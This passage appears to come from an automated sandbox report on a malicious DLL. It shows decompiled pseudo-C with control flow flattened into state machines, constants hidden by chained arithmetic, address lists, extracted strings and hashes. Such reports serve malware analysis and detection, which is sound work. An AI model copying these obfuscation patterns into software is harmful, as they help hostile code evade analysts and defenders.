				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) | 0xb2517b85;
				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) + 0xffff8485;
				_t417 = 0x47;
				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) / _t417;
				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) ^ 0x028281f3;
				 *(_t466 + 0x14) = 0x40cf;
				_t418 = 0x54;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) / _t418;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) >> 0xf;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) + 0xffffcfbb;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) ^ 0xffffd245;
				 *(_t466 + 0x70) = 0xec9;
				 *(_t466 + 0x70) =  *(_t466 + 0x70) | 0x66abf62f;
				 *(_t466 + 0x70) =  *(_t466 + 0x70) >> 2;
				 *(_t466 + 0x70) =  *(_t466 + 0x70) ^ 0x19aa8e93;
				 *(_t466 + 0x9c) = 0xb92f;
				 *(_t466 + 0x9c) =  *(_t466 + 0x9c) << 0xa;
				 *(_t466 + 0x9c) =  *(_t466 + 0x9c) ^ 0x02e4dd06;
				 *(_t466 + 0x40) = 0xf9b7;
				 *(_t466 + 0x40) =  *(_t466 + 0x40) ^ 0xd32ba56e;
				 *(_t466 + 0x40) =  *(_t466 + 0x40) + 0xffff6d4c;
				_t409 =  *(_t466 + 0xb0);
				 *(_t466 + 0x40) =  *(_t466 + 0x40) / _t408;
				 *(_t466 + 0x40) =  *(_t466 + 0x40) ^ 0x01bea26b;
				 *(_t466 + 0x68) = 0x7664;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) >> 0xc;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) + 0xffff8a59;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) ^ 0xffff9898;
				do {
					while(_t460 != 0x4166320) {
						if(_t460 == 0x5d953cf) {
							E10018668( *(_t466 + 0x68),  *(_t466 + 0x40), __eflags,  *(_t466 + 0x48), _t466 + 0x2c8);
							_t460 = 0x2c6b1ef9;
							continue;
						} else {
							if(_t460 == 0xe980b9f) {
								_t460 = 0x273bc967;
								continue;
							} else {
								if(_t460 == 0x1c525ebd) {
									_t409 = E1000492A( *(_t466 + 0x60), 0,  *((intOrPtr*)(_t466 + 0xc0)),  *((intOrPtr*)(_t466 + 0xb4)),  *(_t466 + 0x4c),  *(_t466 + 0x60),  *(_t466 + 0x6c),  *(_t466 + 0x9c),  *(_t466 + 0x60),  *((intOrPtr*)(_t466 + 0x4e8)),  *(_t466 + 0x88),  *((intOrPtr*)(_t466 + 0x80)),  *(_t466 + 0x9c),  *(_t466 + 0x48));
									_t466 = _t466 + 0x30;
									__eflags = _t395 - 0xffffffff;
									if(__eflags != 0) {
										_t460 = 0x35123284;
										continue;
									}
								} else {
									if(_t460 == 0x273bc967) {
										E10008C0C( *(_t466 + 0x70), __eflags,  *(_t466 + 0x18),  *(_t466 + 0x94), _t466 + 0xc0);
										_t400 = E10001E13( *(_t466 + 0x38),  *(_t466 + 0x30),  *(_t466 + 0x70),  *((intOrPtr*)(_t466 + 0xb8)), _t466 + 0xcc);
										_t466 = _t466 + 0x18;
										_t460 = 0x5d953cf;
										 *_t400 = 0;
										continue;
									} else {
										if(_t460 == 0x2c6b1ef9) {
											_push( *((intOrPtr*)(_t466 + 0x4d4)));
											_push( *(_t466 + 0x84));
											E100164EC( *((intOrPtr*)(_t466 + 0xbc)), __eflags, E1001BF25( *(_t466 + 0x7c),  *(_t466 + 0x60), __eflags),  *((intOrPtr*)(_t466 + 0xcc)), 0x104, _t466 + 0x2e0, _t466 + 0xd0,  *(_t466 + 0x5c),  *(_t466 + 0x94),  *(_t466 + 0x44));
											E1001C5F7( *(_t466 + 0x68),  *(_t466 + 0x58),  *(_t466 + 0x84),  *(_t466 + 0x98), _t401);
											_t466 = _t466 + 0x34;
											_t460 = 0x1c525ebd;
											continue;
										} else {
											if(_t460 != 0x35123284) {
												goto L16;
											} else {
												E10001F8B( *((intOrPtr*)(_t464 + 4)),  *((intOrPtr*)(_t466 + 0xc4)),  *(_t466 + 0x38),  *((intOrPtr*)(_t466 + 0xb8)), _t464 + 4,  *(_t466 + 0x3c),  *((intOrPtr*)(_t466 + 0x20)), _t409, _t464 + 4,  *_t464);
												_t466 = _t466 + 0x20;
												_t460 = 0x4166320;
												_t457 =  !=  ? 1 : _t457;
												continue;
											}
										}
									}
								}
							}
						}
						goto L17;
					}
					E100078F0(_t409,  *(_t466 + 0x7c),  *(_t466 + 0xa4),  *(_t466 + 0x44),  *(_t466 + 0x68));
					_t466 = _t466 + 0xc;
					_t460 = 0x2a923978;
					L16:
					__eflags = _t460 - 0x2a923978;
				} while (__eflags != 0);
				L17:
				return _t457;
			}

0x1000262e
0x10002639
0x10002648
0x1000264a
0x10002651
0x10002658
0x1000265a
0x10002664
0x10002669
0x1000266e
0x10002676
0x1000267e
0x10002686
0x1000268e
0x10002696
0x1000269e
0x100026a6
0x100026ae
0x100026b3
0x100026bb
0x100026c9
0x100026ce
0x100026d4
0x100026dc
0x100026e4
0x100026f1
0x100026f4
0x100026f8
0x10002700
0x10002708
0x10002710
0x1000271b
0x10002723
0x1000272e
0x10002736
0x10002746
0x1000274a
0x10002752
0x1000275a
0x10002762
0x1000276f
0x10002770
0x10002774
0x10002779
0x10002781
0x10002789
0x10002791
0x10002799
0x100027a1
0x100027ac
0x100027b7
0x100027c2
0x100027ca
0x100027d2
0x100027d7
0x100027df
0x100027ed
0x100027f1
0x100027f9
0x100027fe
0x10002806
0x1000280e
0x10002818
0x1000281e
0x10002826
0x1000282e
0x10002836
0x1000283e
0x1000284c
0x10002851
0x10002857
0x1000285f
0x10002867
0x10002872
0x1000287d
0x10002888
0x1000289a
0x1000289d
0x100028a4
0x100028af
0x100028b7
0x100028bf
0x100028c7
0x100028cf
0x100028da
0x100028e5
0x100028f0
0x100028f8
0x10002900
0x10002905
0x1000290a
0x10002912
0x1000291a
0x1000291f
0x10002924
0x10002929
0x10002931
0x10002939
0x10002941
0x10002949
0x1000294e
0x10002956
0x10002966
0x1000296e
0x10002976
0x1000297e
0x10002986
0x1000298b
0x10002993
0x100029a6
0x100029ad
0x100029b8
0x100029c3
0x100029ce
0x100029d9
0x100029e1
0x100029e9
0x100029ee
0x100029f3
0x100029fb
0x10002a0e
0x10002a15
0x10002a20
0x10002a28
0x10002a30
0x10002a38
0x10002a43
0x10002a4b
0x10002a56
0x10002a5e
0x10002a66
0x10002a6b
0x10002a75
0x10002a80
0x10002a88
0x10002a93
0x10002a9b
0x10002aa6
0x10002aab
0x10002aaf
0x10002ab7
0x10002abf
0x10002aca
0x10002ad5
0x10002ae0
0x10002ae8
0x10002af0
0x10002afe
0x10002b03
0x10002b07
0x10002b0f
0x10002b1d
0x10002b22
0x10002b26
0x10002b2b
0x10002b33
0x10002b3b
0x10002b43
0x10002b4b
0x10002b50
0x10002b58
0x10002b63
0x10002b6b
0x10002b76
0x10002b7e
0x10002b86
0x10002b94
0x10002b9b
0x10002b9f
0x10002ba7
0x10002baf
0x10002bb4
0x10002bbc
0x10002bc4
0x10002bc4
0x10002bd6
0x10002da2
0x10002da9
0x00000000
0x10002bdc
0x10002be2
0x10002d84
0x00000000
0x10002be8
0x10002bee
0x10002d70
0x10002d72
0x10002d75
0x10002d78
0x10002d7a
0x00000000
0x10002d7a
0x10002bf4
0x10002bfa
0x10002cef
0x10002d0f
0x10002d14
0x10002d17
0x10002d1e
0x00000000
0x10002c00
0x10002c06
0x10002c53
0x10002c5a
0x10002caa
0x10002cc6
0x10002ccb
0x10002cce
0x00000000
0x10002c08
0x10002c0e
0x00000000
0x10002c14
0x10002c39
0x10002c40
0x10002c44
0x10002c4b
0x00000000
0x10002c4b
0x10002c0e
0x10002c06
0x10002bfa
0x10002bee
0x10002be2
0x00000000
0x10002bd6
0x10002dc8
0x10002dcd
0x10002dd0
0x10002dd5
0x10002dd5
0x10002dd5
0x10002de1
0x10002ded

Strings

E, xrefs: 10002AE0
m^, xrefs: 10002A56
b-, xrefs: 10002A93
ZdP, xrefs: 100028F8
l7, xrefs: 1000265A
5H, xrefs: 100028E5
dv, xrefs: 10002BA7
f_, xrefs: 10002806
(9, xrefs: 1000274A
#z, xrefs: 10002929
z), xrefs: 10002781
j, xrefs: 1000283E
rA, xrefs: 100029FB

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #z$(9$5H$b-$dv$f_$j$l7$m^$rA$z)$E$ZdP
API String ID: 0-500794611
Opcode ID: 6c22406395d75c115b4026df920d1e405d61ac760d96bcec021409155602d6bf
Instruction ID: 2f189fb40b88e7232357bad84871cb140e457652571658457e73c86c02e6a5c1
Opcode Fuzzy Hash: 6c22406395d75c115b4026df920d1e405d61ac760d96bcec021409155602d6bf
Instruction Fuzzy Hash: 7D021F715093819FE368CF21C98AA4FBBE1BBC4748F10891DE2D9962A0D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10009CC8, Relevance: 16.5, Strings: 13, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10009CC8() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				intOrPtr _t232;
				void* _t233;
				intOrPtr _t236;
				void* _t246;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				intOrPtr _t277;
				signed int* _t279;
				void* _t282;

				_t279 =  &_v612;
				_v532 = 0x572357;
				_v528 = 0x2f5978;
				_t270 = 0xf;
				_t277 = 0;
				_v524 = 0;
				_t246 = 0x31c11544;
				_v612 = 0x129f;
				_v612 = _v612 / _t270;
				_v612 = _v612 ^ 0xf442200a;
				_v612 = _v612 + 0x8904;
				_v612 = _v612 ^ 0xf442aa27;
				_v608 = 0x5b59;
				_t271 = 7;
				_v608 = _v608 / _t271;
				_v608 = _v608 ^ 0x00000d25;
				_v596 = 0x2567;
				_v596 = _v596 ^ 0xfa26aa3d;
				_v596 = _v596 << 0x10;
				_t272 = 0x51;
				_v596 = _v596 / _t272;
				_v596 = _v596 ^ 0x01c566ae;
				_v564 = 0x2177;
				_v564 = _v564 ^ 0x4051fc1c;
				_v564 = _v564 ^ 0xb5034854;
				_v564 = _v564 ^ 0xf552b9fc;
				_v552 = 0xa42c;
				_v552 = _v552 + 0xffff8520;
				_t273 = 0x36;
				_v552 = _v552 / _t273;
				_v552 = _v552 ^ 0x00005687;
				_v556 = 0x4d63;
				_v556 = _v556 ^ 0x23f659e6;
				_v556 = _v556 << 4;
				_v556 = _v556 ^ 0x3f617f89;
				_v548 = 0xc92c;
				_t274 = 0x1f;
				_v548 = _v548 / _t274;
				_v548 = _v548 | 0xd485f233;
				_v548 = _v548 ^ 0xd4858bcc;
				_v608 = 0x4780;
				_v608 = _v608 + 0xffff036b;
				_v608 = _v608 ^ 0xffff7b62;
				_v592 = 0xf0a1;
				_v592 = _v592 ^ 0x3b3a717c;
				_v592 = _v592 ^ 0x4319cb35;
				_v592 = _v592 + 0x4f8d;
				_v592 = _v592 ^ 0x78239a46;
				_v588 = 0x33cb;
				_v588 = _v588 * 0x50;
				_v588 = _v588 | 0x5a8f737f;
				_v588 = _v588 ^ 0x5a9f48d0;
				_v536 = 0x13fd;
				_v536 = _v536 * 5;
				_v536 = _v536 ^ 0x00004fad;
				_v600 = 0x5083;
				_v600 = _v600 ^ 0xb24ff3ec;
				_v600 = _v600 + 0xffff65b9;
				_t275 = 0x35;
				_v600 = _v600 * 0x36;
				_v600 = _v600 ^ 0x9cabf209;
				_v572 = 0x63e6;
				_v572 = _v572 << 3;
				_v572 = _v572 + 0x6ca3;
				_v572 = _v572 ^ 0x0003addb;
				_v540 = 0x1289;
				_v540 = _v540 >> 1;
				_v540 = _v540 ^ 0x00003929;
				_v544 = 0x5834;
				_v544 = _v544 ^ 0x9eb824c8;
				_v544 = _v544 ^ 0x9eb8689b;
				_v584 = 0x7c37;
				_v584 = _v584 * 0x74;
				_v584 = _v584 ^ 0x66bbdc02;
				_v584 = _v584 ^ 0x6683aa43;
				_v568 = 0x4cc0;
				_v568 = _v568 | 0x439ba37f;
				_v568 = _v568 + 0xffffbc9e;
				_v568 = _v568 ^ 0x439bbd6b;
				_v560 = 0x409b;
				_v560 = _v560 + 0x5a42;
				_v560 = _v560 + 0xabe3;
				_v560 = _v560 ^ 0x000101e3;
				_v612 = 0x62bf;
				_v612 = _v612 << 9;
				_v612 = _v612 + 0xffffd5ba;
				_v612 = _v612 ^ 0xe652b9b2;
				_v612 = _v612 ^ 0xe697c132;
				_v576 = 0x7077;
				_t276 = _v608;
				_v576 = _v576 / _t275;
				_v576 = _v576 * 5;
				_v576 = _v576 ^ 0x00006027;
				_v580 = 0x9a4a;
				_v580 = _v580 + 0x4b3e;
				_v580 = _v580 << 0xe;
				_v580 = _v580 ^ 0x396d003f;
				goto L1;
				do {
					while(1) {
						L1:
						_t282 = _t246 - 0x31c11544;
						if(_t282 > 0) {
							break;
						}
						if(_t282 == 0) {
							_push(_t246);
							_t236 = E100157E8(0x440);
							 *0x100221b0 = _t236;
							__eflags = _t236;
							if(__eflags == 0) {
								L23:
								return _t277;
							}
							 *((intOrPtr*)(_t236 + 0x21c)) = E100094EC;
							_t246 = 0x30823c81;
							continue;
						}
						if(_t246 == 0x687b4fe) {
							_v604 = 0xf298;
							_t246 = 0x37d3e938;
							_v604 = _v604 + 0xbb6f;
							_v604 = _v604 ^ 0x0001ae2e;
							continue;
						}
						if(_t246 == 0x8847984) {
							E10008C0C(_v584, __eflags, _v568, _v560,  &_v520);
							 *((intOrPtr*)( *0x100221b0 + 0xc)) = E1001C424( &_v520, _v576);
							goto L23;
						}
						if(_t246 == 0x2aee8ed5) {
							_v604 = 0xdb1c;
							_t246 = 0x3b385d06;
							_v604 = _v604 | 0xf22f27d0;
							_v604 = _v604 ^ 0xf22fffc0;
							 *((intOrPtr*)( *0x100221b0 + 0x220)) = E10017A42;
							continue;
						}
						if(_t246 != 0x30823c81) {
							goto L20;
						}
						_t276 = E1000DA66(_v580, _t267, _v552, _t246, _v556);
						_t279 =  &(_t279[3]);
						if(_t276 == 0) {
							_t246 = 0x2aee8ed5;
						} else {
							 *((intOrPtr*)( *0x100221b0 + 0x22c)) = 1;
							_t246 = 0x687b4fe;
						}
					}
					__eflags = _t246 - 0x37d3e938;
					if(_t246 == 0x37d3e938) {
						_t267 = _t276;
						E1001F23C(_v548, _t276, _v608, _v592, _v588);
						_t279 =  &(_t279[3]);
						_t246 = 0x3b385d06;
						goto L20;
					}
					__eflags = _t246 - 0x3b385d06;
					if(_t246 == 0x3b385d06) {
						_push(_t246);
						_t198 =  &_v600; // 0x6027
						_t267 = _v536;
						_t232 = E10001D54(_v536, _t246,  *_t198, _v572, _v540,  *0x100221b0 + 0x234, _v544, _v604);
						_t279 =  &(_t279[8]);
						_t246 = 0x3b59d612;
						__eflags = _t232;
						_t233 = 1;
						_t277 =  ==  ? _t233 : _t277;
						goto L1;
					}
					__eflags = _t246 - 0x3b59d612;
					if(_t246 != 0x3b59d612) {
						goto L20;
					}
					E10007605();
					_t246 = 0x8847984;
					goto L1;
					L20:
					__eflags = _t246 - 0x393fa17b;
				} while (__eflags != 0);
				goto L23;
			}

0x10009cc8
0x10009cce
0x10009cd8
0x10009ce6
0x10009ce7
0x10009cee
0x10009cf2
0x10009cf4
0x10009d04
0x10009d0a
0x10009d12
0x10009d1a
0x10009d22
0x10009d2e
0x10009d33
0x10009d39
0x10009d41
0x10009d49
0x10009d51
0x10009d5a
0x10009d5f
0x10009d65
0x10009d6d
0x10009d75
0x10009d7d
0x10009d85
0x10009d8d
0x10009d95
0x10009da1
0x10009da6
0x10009dac
0x10009db4
0x10009dbc
0x10009dc4
0x10009dc9
0x10009dd1
0x10009ddd
0x10009de0
0x10009de4
0x10009dec
0x10009df4
0x10009dfc
0x10009e04
0x10009e0c
0x10009e14
0x10009e1c
0x10009e24
0x10009e2c
0x10009e34
0x10009e41
0x10009e45
0x10009e4d
0x10009e55
0x10009e62
0x10009e66
0x10009e6e
0x10009e78
0x10009e85
0x10009e94
0x10009e95
0x10009e99
0x10009ea1
0x10009ea9
0x10009eae
0x10009eb6
0x10009ebe
0x10009ec6
0x10009eca
0x10009ed2
0x10009eda
0x10009ee2
0x10009eea
0x10009ef7
0x10009efb
0x10009f03
0x10009f0b
0x10009f13
0x10009f1b
0x10009f23
0x10009f2b
0x10009f33
0x10009f3b
0x10009f43
0x10009f4b
0x10009f53
0x10009f58
0x10009f60
0x10009f68
0x10009f70
0x10009f7e
0x10009f82
0x10009f8b
0x10009f8f
0x10009f97
0x10009f9f
0x10009fa7
0x10009fac
0x10009fac
0x10009fb4
0x10009fb4
0x10009fb4
0x10009fb4
0x10009fb6
0x00000000
0x00000000
0x10009fbc
0x1000a07d
0x1000a083
0x1000a088
0x1000a08e
0x1000a090
0x1000a16a
0x1000a175
0x1000a175
0x1000a096
0x1000a0a0
0x00000000
0x1000a0a0
0x10009fc8
0x1000a053
0x1000a05b
0x1000a060
0x1000a068
0x00000000
0x1000a068
0x10009fd4
0x1000a147
0x1000a166
0x00000000
0x1000a166
0x10009fe0
0x1000a025
0x1000a02d
0x1000a02f
0x1000a037
0x1000a044
0x00000000
0x1000a044
0x10009fe8
0x00000000
0x00000000
0x1000a000
0x1000a002
0x1000a007
0x1000a01e
0x1000a009
0x1000a011
0x1000a017
0x1000a017
0x1000a007
0x1000a0aa
0x1000a0b0
0x1000a110
0x1000a11e
0x1000a123
0x1000a126
0x00000000
0x1000a126
0x1000a0b2
0x1000a0b4
0x1000a0cd
0x1000a0e9
0x1000a0ed
0x1000a0f2
0x1000a0f7
0x1000a0fa
0x1000a0ff
0x1000a103
0x1000a104
0x00000000
0x1000a104
0x1000a0b6
0x1000a0bc
0x00000000
0x00000000
0x1000a0be
0x1000a0c3
0x00000000
0x1000a128
0x1000a128
0x1000a128
0x00000000

Strings

c, xrefs: 10009EA1
%, xrefs: 10009D39
>K, xrefs: 10009F9F
4X, xrefs: 10009ED2
)9, xrefs: 10009ECA
7|, xrefs: 10009EEA
W#W, xrefs: 10009CCE
?, xrefs: 10009FAC
BZ, xrefs: 10009F33
cM, xrefs: 10009DB4
xY/, xrefs: 10009CD8
'`?, xrefs: 1000A0E9
|q:;, xrefs: 10009E14

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %$'`?$)9$4X$7|$>K$?$BZ$W#W$cM$xY/$|q:;$c
API String ID: 0-1474617872
Opcode ID: c55b65cf264b45a8f1d4d1e29e0531854e93195efa71f3acd17f3e7a948af3bd
Instruction ID: ba7fc6154232bfd8db280ed454fca39f84720541494348eac49d9c349cc68150
Opcode Fuzzy Hash: c55b65cf264b45a8f1d4d1e29e0531854e93195efa71f3acd17f3e7a948af3bd
Instruction Fuzzy Hash: C8B121B15093819FE358CF65C58981BFBE1FBC5788F104A1DF596862A0C3B98A49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 100106C2, Relevance: 15.4, Strings: 12, Instructions: 383
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E100106C2(intOrPtr* __ecx, void* __edx, char _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v1;
				char _v96;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				intOrPtr _v264;
				signed int _v268;
				intOrPtr _v272;
				signed int _v276;
				signed int _v280;
				unsigned int _v284;
				signed int _v288;
				void* _t345;
				intOrPtr _t372;
				void* _t379;
				signed int _t383;
				void* _t391;
				intOrPtr* _t399;
				char _t404;
				intOrPtr* _t410;
				char* _t433;
				char* _t436;
				signed int _t437;
				intOrPtr* _t440;
				signed int* _t442;
				void* _t445;

				_t399 = _a12;
				_push(_t399);
				_push(_a8);
				_t440 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t345);
				_v120 = 0x55e52e;
				_v112 = 0;
				_t442 =  &(( &_v288)[5]);
				_v116 = 0x6a087e;
				_v148 = 0x434e;
				_t437 = 0x13292eb2;
				_v148 = _v148 + 0xffff9485;
				_v148 = _v148 ^ 0xffffd793;
				_v156 = 0xec79;
				_v156 = _v156 ^ 0xb43b0e66;
				_v156 = _v156 ^ 0xb43be21d;
				_v200 = 0xee7d;
				_v200 = _v200 | 0x0533a7d7;
				_v200 = _v200 + 0xfffff45a;
				_v200 = _v200 ^ 0x05338944;
				_v216 = 0x86ca;
				_v216 = _v216 + 0x54b4;
				_v216 = _v216 ^ 0xa0eca1d2;
				_v216 = _v216 ^ 0xa0ec1e31;
				_v232 = 0x5704;
				_v232 = _v232 + 0x87d6;
				_push(0x16);
				_v164 = 0;
				_push(7);
				_v232 = _v232 / 0;
				_v232 = _v232 >> 5;
				_v232 = _v232 ^ 0x000017c2;
				_v240 = 0x5173;
				_v240 = _v240 * 0x25;
				_v240 = _v240 << 0xa;
				_v240 = _v240 / 0;
				_v240 = _v240 ^ 0x06ba4efb;
				_v248 = 0xc74b;
				_v248 = _v248 * 0x7e;
				_v248 = _v248 + 0xffff822f;
				_v248 = _v248 * 0x4c;
				_v248 = _v248 ^ 0x1cf92e4a;
				_v256 = 0x686e;
				_v256 = _v256 * 0x12;
				_v256 = _v256 ^ 0xf8fdd26c;
				_v256 = _v256 * 0x52;
				_v256 = _v256 ^ 0xc03ea1b3;
				_v244 = 0x2add;
				_v244 = _v244 << 0xf;
				_v244 = _v244 + 0xffffde04;
				_v244 = _v244 << 8;
				_v244 = _v244 ^ 0x6e5e34dd;
				_v284 = 0xf4e0;
				_v284 = _v284 + 0xba09;
				_v284 = _v284 | 0xa2bb5836;
				_v284 = _v284 >> 2;
				_v284 = _v284 ^ 0x28aee5c9;
				_v168 = 0x9f31;
				_v168 = _v168 >> 6;
				_v168 = _v168 ^ 0x000048ec;
				_v220 = 0x7e53;
				_v220 = _v220 << 6;
				_v220 = _v220 * 0x50;
				_v220 = _v220 ^ 0x09de0db5;
				_v188 = 0x17a8;
				_v188 = _v188 + 0x52a9;
				_v188 = _v188 / 0;
				_v188 = _v188 ^ 0x00004610;
				_v196 = 0x5cc1;
				_v196 = _v196 + 0xffff31d1;
				_v196 = _v196 | 0xc97284eb;
				_v196 = _v196 ^ 0xffffe02f;
				_v172 = 0xda7e;
				_v172 = _v172 << 0xe;
				_v172 = _v172 ^ 0x369fe494;
				_v144 = 0xccad;
				_v144 = _v144 | 0x339a4d00;
				_v144 = _v144 ^ 0x339a877a;
				_v288 = 0xfcaa;
				_v288 = _v288 << 2;
				_v288 = _v288 + 0x9909;
				_v288 = _v288 << 0xc;
				_v288 = _v288 ^ 0x48bb2562;
				_v152 = 0x61b7;
				_v152 = _v152 << 0x10;
				_v152 = _v152 ^ 0x61b70a03;
				_v140 = 0xc302;
				_v140 = _v140 << 0xf;
				_v140 = _v140 ^ 0x61816c1a;
				_v160 = 0x48ef;
				_v160 = _v160 ^ 0xebfd6bf9;
				_v160 = _v160 ^ 0xebfd7750;
				_v260 = 0x5362;
				_v260 = _v260 >> 6;
				_t404 = 0x6c;
				_v260 = _v260 / 0;
				_v260 = _v260 ^ 0xee3aff63;
				_v260 = _v260 ^ 0xee3aef31;
				_v236 = 0xd35f;
				_v236 = _v236 << 0x10;
				_v236 = _v236 + 0x2900;
				_v236 = _v236 + 0x50af;
				_v236 = _v236 ^ 0xd35f0d2f;
				_v212 = 0x828e;
				_v212 = _v212 | 0x8b388828;
				_v212 = _v212 * 0xa;
				_v212 = _v212 ^ 0x70352860;
				_v228 = 0xeb91;
				_v228 = _v228 ^ 0xa86be6f8;
				_v228 = _v228 + 0xffff5277;
				_v228 = _v228 ^ 0xa86a6f69;
				_v184 = 0xae04;
				_v184 = _v184 + 0xffff62af;
				_v184 = _v184 ^ 0x0000117e;
				_v224 = 0x33a1;
				_v224 = _v224 >> 1;
				_v224 = _v224 >> 7;
				_v224 = _v224 ^ 0x00005b9c;
				_v268 = 0xe65;
				_v268 = _v268 * 0x1a;
				_v268 = _v268 >> 2;
				_v268 = _v268 >> 5;
				_v268 = _v268 ^ 0x00000bed;
				_v176 = 0xa4d1;
				_v176 = _v176 | 0x37797fb5;
				_v176 = _v176 ^ 0x3779d180;
				_v252 = 0x4dfa;
				_v252 = _v252 >> 0xf;
				_v252 = _v252 ^ 0x7040ff32;
				_v252 = _v252 ^ 0x70408cc6;
				_v276 = 0x9261;
				_v276 = _v276 ^ 0x928292e1;
				_v276 = _v276 + 0xbfd3;
				_v276 = _v276 >> 0xd;
				_v276 = _v276 ^ 0x0004a09c;
				_v192 = 0x5c67;
				_v192 = _v192 << 4;
				_v192 = _v192 >> 0xf;
				_v192 = _v192 ^ 0x00002cc8;
				_v204 = 0xa9b8;
				_v204 = _v204 << 5;
				_v204 = _v204 + 0xffff3dee;
				_v204 = _v204 ^ 0x0014203e;
				_v180 = 0xc206;
				_v180 = _v180 * 0x36;
				_v180 = _v180 ^ 0x0028c8dc;
				_v280 = 0x96db;
				_v280 = _v280 + 0xeb7e;
				_v280 = _v280 >> 7;
				_v280 = _v280 ^ 0x33900b7e;
				_v280 = _v280 ^ 0x33901db2;
				_v208 = 0xb5f5;
				_v208 = _v208 >> 6;
				_v208 = _v208 + 0xfc0c;
				_v208 = _v208 ^ 0x0000fee2;
				_t436 = _v132;
				while(1) {
					L1:
					_t427 = _v264;
					_t365 = _v272;
					while(1) {
						_t445 = _t437 - 0x19192d48;
						if(_t445 > 0) {
							goto L23;
						}
						L3:
						if(_t445 == 0) {
							_v124 = _t404;
							_t379 = E100105E8( &_v108,  *((intOrPtr*)( *0x100221b4 + 0x14)), _v148, _v212, _v228, _v184, _v224, _v208,  *((intOrPtr*)( *0x100221b4)),  &_v124);
							_t442 =  &(_t442[8]);
							if(_t379 == 0) {
								_t437 = 0x272c22c8;
							} else {
								_t410 =  &_v1;
								_t433 = _t436;
								do {
									 *_t433 =  *_t410;
									_t433 = _t433 + 1;
									_t410 = _t410 - 1;
								} while (_t410 >=  &_v96);
								_t437 = 0xe3e0850;
							}
							goto L9;
						} else {
							if(_t437 == 0x95d06e9) {
								_t383 = _a4 + 1;
								if((_t383 & 0x0000000f) != 0) {
									_t383 = (_t383 & 0xfffffff0) + 0x10;
								}
								 *((intOrPtr*)(_t399 + 4)) = _t383 + 0x74;
								_push(_t404);
								_t436 = E100157E8( *((intOrPtr*)(_t399 + 4)));
								 *_t399 = _t436;
								if(_t436 == 0) {
									goto L34;
								}
								_t305 = _t436 + 0x74; // 0x74
								_t427 = _t305;
								_t365 =  *((intOrPtr*)(_t399 + 4)) - 0x74;
								_v264 = _t305;
								_t437 = 0x154603b2;
								_v132 = _a4;
								_v272 =  *((intOrPtr*)(_t399 + 4)) - 0x74;
								goto L10;
							} else {
								if(_t437 == 0xe3e0850) {
									_v128 = 0x14;
									_t391 = E10007471(_v156, _v268, _v176, _v252,  &_v128, _v276, _t436 + 0x60, _t404, _v192, _v136);
									_t427 = _v264;
									_t442 =  &(_t442[8]);
									_t365 = _v272;
									_t404 = 0x6c;
									if(_t391 == 0) {
										continue;
									} else {
										_t437 = 0x272c22c8;
										_v164 = 1;
										goto L9;
									}
								} else {
									if(_t437 == 0x13292eb2) {
										_t437 = 0x95d06e9;
										continue;
									} else {
										if(_t437 != 0x154603b2) {
											L30:
											if(_t437 == 0x4324b34) {
												L34:
												return _v164;
											}
											goto L1;
										} else {
											_t280 =  &_v284; // 0xee3aef31
											E1000CB42(_v244,  *_t280, _v168, _t404,  &_v136,  *((intOrPtr*)( *0x100221b4 + 0x10)), _t404, _v220);
											_t442 =  &(_t442[6]);
											asm("sbb esi, esi");
											_t437 = (_t437 & 0xeb9139e0) + 0x306f06ef;
											L9:
											_t365 = _v272;
											_t427 = _v264;
											L10:
											_t404 = 0x6c;
											while(1) {
												_t445 = _t437 - 0x19192d48;
												if(_t445 > 0) {
													goto L23;
												}
												goto L3;
											}
											goto L23;
										}
									}
								}
							}
						}
						L24:
